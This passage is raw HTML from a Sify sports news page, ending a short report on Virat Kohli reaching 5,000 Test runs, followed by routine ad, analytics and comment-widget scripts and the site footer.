He played a brilliant backfoot drive past point off Lakmal to get within a run and then drove him for another boundary past wide mid-off to go past the mark.</p><p>
Congratulating the India skipper, the International Cricket Council (ICC) posted on Twitter: "Congratulations to @imVkohli on passing 5,000 Test runs! He reaches the milestone in 105 innings - the same number as England captain @root66!"</p><p><i>Stay updated on the go with Sify Live Scores App. <a href="https://play.google.com/store/apps/details?id=com.sify.sports">Click here to download it for your device</a></i></p></div><!-- /29073306/Fullstory_OutOfPage_ATF -->
<script>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1491549670496-0'); });
</script>
<!-- /29073306/Fullstory_OutOfPage_ATF --><!-- Sports Widget Code --> 
<div id="vt_widget"></div>
<script type="text/javascript">
window.__ventunowidget = window.__ventunowidget||[];
window.__ventunowidget.push({ publisher_code:'4e997f608d6b8',widget_code:'278',holder_id:'vt_widget' });
window.__ventunowidget.push({ flush:true });
</script>
<script type="text/javascript" src="https://pl.ventunotech.com/plugins/widgets/ventuno_widget.js"></script>
<!-- Sports Widget Code --> <div><p><script type="text/javascript"> /**  ROS TAG for Banner Zone 803 generated: 15th December 2015 */ rm_ad_obj = { zone_id : 803 };</script><script type="text/javascript" src="http://cdn.revenuemantra.com/ads_v1.min.js"></script></p></div></p><div id='srcword' name='srcword' style='display:none;position:absolute; width:310px;'><div id='search_box' class='divflip'><form id='search_form_new' name='search_form_new' method='post' action='http://search.sify.com/'><input name ='s' type='text' id='s' value='' class='swap_value' onKeydown='javascript: if (event.keyCode==13) {submit_form();}'/></form></div><div style='float:left;width:310px;'><div style='float:left;width:310px;'><div style='width:16px;float:left;background-image:url(http://im.sify.com/images/corner-3.png);height:114px;background-repeat:no-repeat;'><img src='http://im.sify.com/images/corner-3.png' width='18' height='114' /></div><div style='width:260px;float:left;background-image:url(http://im.sify.com/images/bg-2.png);height:114px;'><div style='width:260px;float:left;'><div style='width:100px;float:left;text-align:left;padding-top:25px;' class='arial12white-b'>SEARCH</div><div style='width:160px;float:left;text-align:right;padding-top:25px;'><img src='http://im.sify.com/images/google1.jpg' width='113' height='23' /></div></div><div style='width:260px;float:left;'><div style='width:40px;float:right;text-align:right;padding-top:15px;'><a onclick='javascript: submit_form();' style='cursor:pointer;'><img onclick='javascript: submit_form();' src='http://im.sify.com/images/icon1.jpg' width='31' height='30' border='0'/></a></div> </div></div><div style='width:26px;float:left;'><a onclick='javascript:vanishdiv();' style='cursor:pointer;'><div style='width:26px;float:left;background-image:url(http://im.sify.com/images/corner-4.png);height:114px;background-repeat:no-repeat;'><img src='http://im.sify.com/images/corner-4.png' width='24' height='114' border='0' /></div></a></div></div></div></div></div>
    </div>
    </div>

<div id="fullstory-YML_wrapper1">
	
    <div class="spacer-H20"></div>
	
    <div class="innerad320x50 mob-on mobBig-on desk-off tab-off">
    <!--GADS 2 Starts-->
    <!--GADS 2 Ends -->
    </div>
    <div id="fullstory-bottom-comments-pyc-wrapper" >    
	<?php //if(function_exists('ismobile') && !ismobile()){ ?>
	<div class="" style="float:left;">
		<div class="addthis_inline_share_toolbox_gszl"></div>
	</div>
	<?php // } ?>
    </div>
    <div class="clearfix"></div>
    <div id="fullstory-related_keywords-wrapper">
	<!--Tags-->
    </div>
    <div class="spacer-H20"></div>    
    <div id="fullstory-article-comments-wrapper">
	<!--Start NLPCaptcha Embed Code -->

                                <script type="text/javascript">
                                       var kommentkey;
				       var currentbrowserurl = window.location.href;	

					if(kommentboxchannel=='news') {
                                        kommentkey='af7804bff05f35a7b0fc8bf2e9d7805d';
                                        }else if(kommentboxchannel=='sports') {
                                        kommentkey='fa881ef5ea03918b4e0149c2502482c8';
                                        }else if(kommentboxchannel=='finance') {
                                        kommentkey='23872213b5855b8124b4bd1fc1148cc4';
                                        }else if(kommentboxchannel=='movies') {
                                        kommentkey='3799c6e19481748b88fd798f72c0d18b';
                                        }else if(kommentboxchannel=='skills') {
                                        kommentkey='af7804bff05f35a7b0fc8bf2e9d7805d';
                                        }else if(kommentboxchannel=='technology') {
                                        kommentkey='1a6ec46b489bdc9b383d9e6cbe700eb2';
                                        }	
                                       var NLPOptions = {

																				    
                                           key:kommentkey, // PUBLISHER_KEY

                                           komentbox_page_identifier: currentbrowserurl, // to identify the current page, If identifier is undefined, the komentbox_page_url will be used

                                           komentbox_page_url: currentbrowserurl, // URL of the current page. If undefined, will take the window.location.href. This URL is used to look up or create a thread if identifier is undefined

                                           komentbox_page_title: '' // the title of the current page, If undefined, will use the <title> attribute of the page

                                       };

                                </script>

                                <script type="text/javascript" src="http://komentbox.nlpcaptcha.in/js/comments.js"></script>

   <!--End NLPCaptcha Embed Code -->
	</div>
	<div class="spacer-H20"></div>
    
    </div>
    </div>
    </div>
    <!--Fullstory Article Ends-->
    <div class="clearfix"></div>

<script type="text/javascript" src="//s7.addthis.com/js/300/addthis_widget.js#pubid=ra-55dd754b001f6e48" async="async"></script>
<script type="text/javascript">
var referringURL=document.referrer;
var currentPage=location.href;
var sourceName= "<a href='http://www.sify.com/sports/moreheadlines/source/ians.html' target='_new'><img src='http://im.sify.com/fullstory/fullstory-revised-2011/source/ians.gif' alt='IANS' border='0' ALIGN='absmiddle'></a>";
var catName="cricket";
var fullTitleVal="title=kohli becomes 4th fastest indian to 5000 test runs&cid=rmcoEccecdafg";
var fullChannelVal="sports";
</script>
<!--*******Stas collection changes Ends*****-->
</div>
</div>
</div>
	    <!-- Mobile off Right Nav -->				<div class="clearfix"></div>
	</div>
	    
	    </div>
	</div>	
	

<style>
.fixed {  position: fixed; top: -3000px; right:calc(50% - 515px);}
</style>
<!-- Container End -->
<group id='footer'>
<div class="footer">
<div class="footer-inner">
<!-- afp footer code starts here -->
<script type="text/javascript">	var adgf_p1="9";	var adgf_p2="0";	var adgf_p3="0";	var adgf_p4="";	var adgf_p5="";	var adgFtSc=document.createElement("script");	adgFtSc.id="adg_pixel_footer_script";	document.body.appendChild(adgFtSc);	adgFtSc.async=true;	var adgScParam="p1="+adgf_p1+"&p2="+adgf_p2+"&p3="+adgf_p3+"&p4="+adgf_p4+"&p5="+adgf_p5;	adgFtSc.src="http://adgebra.co.in/afpf/afpf.js?"+adgScParam;</script>
<noscript>	<iframe id='adg_footer_pixel_script' src="http://adgebra.co.in/afpf/afpf?p1=9&p2=0&p3=1&p4=&p5=" width="0" height="0" frameBorder="0" scrolling="no" marginheight="0" marginwidth="0">
</iframe>
</noscript> <!-- afp footer code ends here -->
 
<style>.footer-nav ul li{padding:0 10px;}</style>
<!-- Footer Start -->
<group id='footer'>
<footer>
	
     <div class="footer-mobtab-services">
        <div class="container">
      	       <!-- SifyHomepage_1x1_Innovation1 -->	<script type='text/javascript'>	googletag.display('div-gpt-ad-1362990599319-0');	</script>    <!-- SifyHomepage_1x1_Innovation1 --><ul>                  <li><a href='http://corporate.sify.com/about-us.html' target='_blank'>About Us</a></li>   <li><a href='http://services.sify.com/' target='_blank'>Buy Domains</a></li>     <li><a href='http://datacentre.sify.com/' target='_blank'>Data Center Cloud</a></li>     <li><a href='http://cloud.sify.com/cloud-enterprise-private.html' target='_blank'>Computing Servers</a></li>     <li><a href='http://cloud.sify.com/cloud-enterprise-public.html' target='_blank'>Cloud Applications Hosting</a></li>   <li><a href='http://www.cloudinfinit.com/' target='_blank'>Cloudinfinit</a></li>   <li><a href='http://telecom.sify.com/domestic-MPLS.html' target='_blank'>MPLS VPN Network Services</a></li>   <li><a href='http://www.seekandsource.com/' target='_blank'>SeekandSource.com</a></li>           </ul>        </div>
    </div>
 
  <div class="footer-bg">
      <div class="container">
      
      <div class="col-md-6 col-sm-6 footer-nav mob-off">
      	         	   <ul>            <li><a href='http://www.sify.com/disclaimer.php'>Disclaimer</a></li>            <li><a href='http://www.sify.com/privacy.php'>Privacy Policy</a></li>            <li><a href='http://corporate.sify.com/careers.html'>Careers</a></li>            <li><a href='http://www.sify.com/feedback/'>Feedback</a></li>            <li><a href='http://www.sify.com/mediakit/'>Advertise</a></li>    <li><a href='http://digitalsolutions.sify.com'>Digital</a></li>      </ul>      </div>
      
      <div class="col-md-6 col-sm-6 paddingr footercopy">
        <div class="footer-copy">&copy; Copyright <a href='http://corporate.sify.com/' target='_blank'>Sify Technologies Ltd</a>, 1998-2017. All rights reserved </div>
      </div>
    </div>
  </div>
</footer>
</group>
<!-- Footer End -->
<!-- jQuery (necessary for Bootstrap's JavaScript plugins) -->
<!--<script src="http://www.sify.com/common2015/js/jquery.min.js"></script>-->
<!-- Include all compiled plugins (below), or include individual files as needed -->
<script src="http://www.sify.com/common2015/js/bootstrap.min.js"></script>
<script src="http://www.sify.com/common2015/js/custom.js"></script>
<script type="text/javascript">
$(document).ready(function () {
	$('#mobileapppromo').slideDown('slow');
	$("#mobileapppromo > button.close").click(function(e) {			
		$('#mobileapppromo').slideUp('slow');
	});
	$('#apppromobanner').click(function() {
		//window.open('http://www.sify.com/sports/sify-sports---live-scores---app-news-others-qjxm9Riajijjj.html','_blank');
	});
	$('#applestorebtn').click(function() {
		window.open('https://itunes.apple.com/us/app/sify-sports-live-scores/id403212548?ls=1&mt=8','_blank');
	});
	$('#playstorebtn').click(function() {
		window.open('https://play.google.com/store/apps/details?id=com.sify.rates');
	});
});
</script>
<!-- Affinity M-Canvas Site Code Starts Here (Required) -->
<script type="text/javascript">
	(function(){
		var param = {
			"pk": "ppc73",
			"aduid": 105
		};
		var d=top.document,s=d.createElement("script"),u=[],p;param.u=d.location.href;param.ref=d.referrer;param.phR=Math.random()+"_"+(new Date).getTime();for(p in param)if(param.hasOwnProperty(p))u.push(p+"="+encodeURIComponent(param[p]));s.src="//ic.ph.affinity.com/init.js?"+u.join("&");s.type="text/javascript";d.getElementsByTagName("head")[0].appendChild(s);
	})();
</script>
<!-- Affinity M-Canvas Site Code Ends Here --></div>
</div>

<script type="text/javascript">
setTimeout(function(){var a=document.createElement("script");
var b=document.getElementsByTagName('script')[0];
a.src=document.location.protocol+"//dnn506yrbagrg.cloudfront.net/pages/scripts/0010/2469.js?"+Math.floor(new Date().getTime()/3600000);
a.async=true;a.type="text/javascript";b.parentNode.insertBefore(a,b)}, 1);
</script>

</group>

<script>
$(function () {
	
    var sidebar = $('.sidebar');

    var top = 3000; //sidebar.offset().top - parseFloat(sidebar.css('margin-top'));
 
   $(document).scroll(function (event) {
      var y = $(this).scrollTop();
      if (y >= top) {
	//alert("top inner");
        sidebar.addClass('fixed');
      } else {
        sidebar.removeClass('fixed');
      }
    });
});
</script>



<script type="text/javascript">var ad_pub_id = 12;</script>
<script src="http://www.sify.com/common2015/js/infintescroll.js"></script>
</body>
</html>
